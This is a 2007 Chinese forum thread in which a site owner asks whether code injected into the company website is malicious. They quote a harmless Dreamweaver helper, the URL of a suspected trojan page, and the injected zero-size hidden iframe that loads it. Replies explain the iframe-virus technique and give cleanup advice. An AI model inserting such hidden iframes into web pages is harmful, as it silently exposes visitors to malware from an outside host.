87,919
社区成员
发帖
与我相关
我的任务
分享大家看看这个代码有没有攻击的可能性....
因为公司一网页被挂了一个链接.... 里面
function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}
有兴趣的可以看看:
http://www.boya.cc/acticle/single/3.asp
这个网页是不是木马网页, 我开杀毒软件是没有发现.. 但我的网站被挂了这个页面..
function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}
有兴趣的可以看看:
http://www.boya.cc/acticle/single/3.asp
这个网页是不是木马网页, 我开杀毒软件是没有发现.. 但我的网站被挂了这个页面..
...全文
请发表友善的回复…
发表回复
总哈哈 2007-09-05
- 打赏
- 举报
就相当于把别人的网页打开了,如果别人的站点上放了病毒,那么客户访问你的站点的时候同样会中毒,就相当于是客户访问你的页的时候同时把病毒网页访问了
CruelYoung123 2007-09-04
- 打赏
- 举报
看看....
saillovemeng 2007-09-04
- 打赏
- 举报
你查查看有没多出一些文件?
创造奇迹9999 2007-09-04
- 打赏
- 举报
先把页面中被加入的代码替换掉,再杀一下木马
cchaha 2007-09-04
- 打赏
- 举报
ASP页面注入漏洞
CruelYoung123 2007-09-04
- 打赏
- 举报
up 没人...今天都不上班了呀.
CruelYoung123 2007-09-04
- 打赏
- 举报
<iframe marginwidth=0 marginheight=0
src="http://www.boya.cc/Acticle/single/3.asp" frameborder=0 width=0
scrolling=no height=0 ></iframe></content>
<image_src/>
</bases>
这是服务器被嵌入的代码. 查了一下..说是普遍的iframe病毒...... 这个主要是利用哪里的漏洞呀...郁闷
CruelYoung123 2007-09-04
- 打赏
- 举报
分不是问题.... 各位大侠看看...呵呵
chaircat 2007-09-04
- 打赏
- 举报
很明显...他要的是访问量...
